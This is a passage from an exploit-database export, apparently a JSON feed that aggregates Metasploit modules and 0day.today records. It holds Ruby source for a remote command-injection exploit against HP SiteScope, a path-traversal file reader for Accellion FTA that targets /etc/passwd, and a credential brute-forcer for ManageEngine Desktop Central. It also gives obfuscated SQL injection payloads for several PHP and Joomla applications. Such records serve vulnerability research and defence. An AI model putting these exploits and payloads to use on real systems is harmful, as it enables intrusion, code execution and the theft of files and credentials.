'method' => 'POST',\n 'vars_get' => {\n 'OWASP_CSRFTOKEN' => csrf_token\n },\n 'cookie' => session,\n 'ctype' => 'application/octet- serializable object',\n 'data' => build_stream(random_mark)\n }, 5)\n\n if res && res.code == 200 && res.body\n res_io = StringIO.new(res.body.to_s)\n res_stream = Rex::Java::Serialization::Model::Stream.decode(res_io)\n return if res_stream.nil?\n show = false\n res_stream.references.each do |ref|\n if ref.class == Rex::Java::Serialization::Model::Utf && show\n print_good(ref.contents)\n next\n elsif ref.class == Rex::Java::Serialization::Model::Utf && ref.contents.include?(random_mark)\n show = true\n next\n end\n end\n end\n end\n\n def get_initial_session_id\n print_status(\"Retrieving an initial JSESSIONID...\")\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path.to_s, 'servlet', 'Main'),\n 'method' => 'POST'\n )\n\n if res and res.code == 200 and res.get_cookies.include?('JSESSIONID')\n session_id = res.get_cookies\n else\n fail_with(Failure::Unknown, \"#{peer} - Retrieve of initial JSESSIONID failed\")\n end\n\n session_id\n end\n\n def authenticate(session_id)\n print_status(\"Authenticating on HP SiteScope Configuration...\")\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path.to_s, 'j_security_check'),\n 'method' => 'POST',\n 'cookie' => session_id,\n 'vars_post' => {\n 'j_username' => datastore['SITE_SCOPE_USER'],\n 'j_password' => datastore['SITE_SCOPE_PASSWORD']\n }\n })\n\n if res && res.code == 302\n redirect = URI(res.headers['Location']).path\n else\n fail_with(Failure::NoAccess, \"#{peer} - Authentication on SiteScope failed\")\n end\n\n redirect\n end\n\n def get_authenticated_session_id(session_id, redirect)\n print_status(\"Following redirection to finish authentication...\")\n\n res = send_request_cgi(\n {\n 'uri' => redirect,\n 'method' => 'GET',\n 'cookie' => session_id\n })\n\n if res && res.code == 200 && res.get_cookies.include?('JSESSIONID')\n auth_session = res.get_cookies\n else\n fail_with(Failure::NoAccess, \"#{peer} - Authentication on SiteScope failed\")\n end\n\n auth_session\n end\n\n def get_csrf_token(session)\n print_status(\"Getting anti-CSRF token...\")\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path.to_s, 'jsp', 'tabs.jsp'),\n 'cookie' => session\n )\n\n if res && res.code == 302 && res.headers['Location'] =~ /OWASP_CSRFTOKEN=([A-Z0-9\\-]+)/\n csrf_token = $1\n else\n fail_with(Failure::Unknown, \"#{peer} - Failed to get anti-CSRF token\")\n end\n\n csrf_token\n end\n\n def build_stream(random_mark)\n site = \"google.com & echo #{random_mark} & \"\n if target.arch.include?('cmd')\n command = payload.encoded\n else\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\n end\n\n file = File.join( Msf::Config.data_directory, 'exploits', 'R7_2015_17', 'stream.raw')\n\n f = File.new(file, 'rb')\n stream = Rex::Java::Serialization::Model::Stream.decode(f)\n f.close\n\n dns_param = stream.references[0x44]\n dns_param.contents = site + command\n dns_param.length = dns_param.contents.length\n\n stream.encode\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_sitescope_dns_tool.rb"}, {"lastseen": "2019-11-18T10:50:14", "bulletinFamily": "exploit", "description": "This module exploits a file disclosure vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'statecode' cookie parameter is appended to a file path that is processed as a HTML template. By prepending this cookie with directory traversal sequence and appending a NULL byte, any file readable by the web user can be exposed. The web user has read access to a number of sensitive files, including the system configuration and files uploaded to the appliance by users. This issue was confirmed on version FTA_9_11_200, but may apply to previous versions as well. This issue was fixed in software update FTA_9_11_210.\n", "modified": "2017-07-24T13:26:21", "published": "2015-07-08T18:42:11", "id": "MSF:AUXILIARY/SCANNER/HTTP/ACCELLION_FTA_STATECODE_FILE_READ", "href": "", "type": "metasploit", "title": "Accellion FTA 'statecode' Cookie Arbitrary File Read", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Accellion FTA 'statecode' Cookie Arbitrary File Read\",\n 'Description' => %q{\n This module exploits a file disclosure vulnerability in the Accellion\n File Transfer appliance. This vulnerability is triggered when a user-provided\n 'statecode' cookie parameter is appended to a file path that is processed as\n a HTML template. By prepending this cookie with directory traversal sequence\n and appending a NULL byte, any file readable by the web user can be exposed.\n The web user has read access to a number of sensitive files, including the\n system configuration and files uploaded to the appliance by users.\n This issue was confirmed on version FTA_9_11_200, but may apply to previous\n versions as well. This issue was fixed in software update FTA_9_11_210.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://r-7.co/R7-2015-08'],\n ['CVE', '2015-2856']\n ],\n 'DisclosureDate' => 'Jul 10 2015'\n ))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('TARGETURI', [true, 'The URI to request that triggers a call to template()', '/courier/intermediate_login.html']),\n OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),\n ])\n end\n\n def run_host(ip)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => datastore['TARGETURI'],\n 'cookie' => 'statecode=../../../../..' + datastore['FILEPATH'] + '%00',\n })\n\n return if not res\n\n if res.code != 200\n vprint_status(\"#{peer} Unexpected response code: #{res.code} #{res.message}\")\n return\n end\n\n contents = res.body.to_s\n\n # Check for patched versions of the FTA\n if contents =~ / Missing session ID.*Accellion, Inc/m\n print_error(\"#{peer} Appears to be a patched Accellion FTA\")\n return\n end\n\n fname = ::File.basename(datastore['FILEPATH'])\n\n expected_server = \"Apache\"\n expected_expires = 'Mon, 26 Jul 1997 05:00:00 GMT'\n\n # Use hints from the server headers to indicate whether we think this was a valid response\n if res.headers['Server'].to_s == expected_server && res.headers['Expires'].to_s == expected_expires\n path = store_loot(\n 'accellion.fta.file',\n 'application/octet-stream',\n rhost,\n res.body,\n fname\n )\n print_good(\"#{peer} Sucessfully downloaded #{datastore['FILEPATH']} as #{path}\")\n else\n vprint_status(\n \"#{peer} Unexpected response headers: (Server=#{res.headers['Server'].inspect} Expected=#{expected_server.inspect}) \" +\n \"(Expires=#{res.headers['Expires'].inspect} Expected=#{expected_expires.inspect})\"\n )\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb"}, {"lastseen": "2019-12-02T00:29:51", "bulletinFamily": "exploit", "description": "This module will attempt to authenticate to a ManageEngine Desktop Central.\n", "modified": "2019-06-27T22:06:32", "published": "2015-04-08T07:05:56", "id": "MSF:AUXILIARY/SCANNER/HTTP/MANAGEENGINE_DESKTOP_CENTRAL_LOGIN", "href": "", "type": "metasploit", "title": "ManageEngine Desktop Central Login Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/manageengine_desktop_central'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Login Utility',\n 'Description' => %q{\n This module will attempt to authenticate to a ManageEngine Desktop Central.\n },\n 'Author' => [ 'sinn3r' ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'RPORT' => 8020}\n ))\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n\n # Initializes CredentialCollection and ManageEngineDesktopCentral\n def init(ip)\n @cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n @scanner = Metasploit::Framework::LoginScanner::ManageEngineDesktopCentral.new(\n configure_http_login_scanner(\n host: ip,\n port: datastore['RPORT'],\n cred_details: @cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 5,\n http_username: datastore['HttpUsername'],\n http_password: datastore['HttpPassword']\n )\n )\n end\n\n\n # Reports a good login credential\n def do_report(ip, port, result)\n service_data = {\n address: ip,\n port: port,\n service_name: 'http',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n module_fullname: self.fullname,\n origin_type: :service,\n private_data: result.credential.private,\n private_type: :password,\n username: result.credential.public,\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n last_attempted_at: DateTime.now,\n status: result.status,\n proof: result.proof\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n\n # Attempts to login\n def bruteforce(ip)\n @scanner.scan! do |result|\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(:level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\")\n do_report(ip, rport, result)\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(:level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\")\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n end\n end\n end\n\n\n # Start here\n def run_host(ip)\n init(ip)\n unless @scanner.check_setup\n print_brute(:level => :error, :ip => ip, :msg => 'Target is not ManageEngine Desktop Central')\n return\n end\n\n bruteforce(ip)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb"}], "zdt": [{"lastseen": "2018-02-14T00:31:08", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-01-28T00:00:00", "published": "2018-01-28T00:00:00", "href": "https://0day.today/exploit/description/29662", "id": "1337DAY-ID-29662", "type": "zdt", "title": "Hot Scripts Clone - subctid SQL Injection Vulnerability", "sourceData": "# # # # # \r\n# Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Vendor Homepage: http://www.phpscriptsmall.com/\r\n# Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# http://localhost/[PATH]/categories?keyword=&mctid=[SQL]&subctid=[SQL]\r\n# \r\n# -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-\r\n# \r\n# # # # #\n\n# 0day.today [2018-02-13] #", "sourceHref": "https://0day.today/exploit/29662", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-10T03:13:08", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-12-10T00:00:00", "published": "2017-12-10T00:00:00", "href": "https://0day.today/exploit/description/29166", "id": "1337DAY-ID-29166", "type": "zdt", "title": "Entrepreneur Job Portal Script 2.0.6 - jobsearch_all.php?rid1 SQL Injection Vulnerability", "sourceData": "# Exploit Title: Entrepreneur Job Portal Script 2.0.6 - SQL Injection \r\n # Dork: N/A \r\n # Date: 08.12.2017 \r\n # Vendor Homepage: https://www.phpscriptsmall.com/ \r\n # Software Link: https://www.phpscriptsmall.com/product/entrepreneur-job-portal-script/ \r\n # Demo: http://freelancewebdesignerchennai.com/demo/job-portal/ \r\n # Version: 2.0.6 \r\n # Category: Webapps \r\n # Tested on: WiN7_x64/KaLiLinuX_x64 \r\n # CVE: N/A \r\n # # # # # \r\n # Exploit Author: Ihsan Sencan \r\n # Author Web: http://ihsan.net \r\n # Author Social: @ihsansencan \r\n # # # # # \r\n # Description: \r\n # The vulnerability allows an attacker to inject sql commands.... \r\n # \r\n # Proof of Concept: \r\n # \r\n # 1) \r\n # http://localhost/[PATH]/jobsearch_all.php?rid1=[SQL] \r\n # \r\n # -1'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+- \r\n # \r\n # \r\n # # # # #\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/29166", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-01T21:39:17", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-02-21T00:00:00", "published": "2017-02-21T00:00:00", "href": "https://0day.today/exploit/description/27076", "id": "1337DAY-ID-27076", "title": "Joomla J-HotelPortal 6.0.2 Component - review_id Parameter SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # # # \r\n# Exploit Title: Joomla! Component J-HotelPortal v6.0.2 - SQL Injection\r\n# Google Dork: inurl:index.php?option=com_jhotelreservation\r\n# Date: 21.02.2017\r\n# Vendor Homepage: http://www.cmsjunkie.com/\r\n# Software Buy: http://www.cmsjunkie.com/joomla-hotel-portal\r\n# Demo: http://hoteldemo.cmsjunkie.com/j3/portal/\r\n# Version: 6.0.2\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail : ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]\r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27076"}]}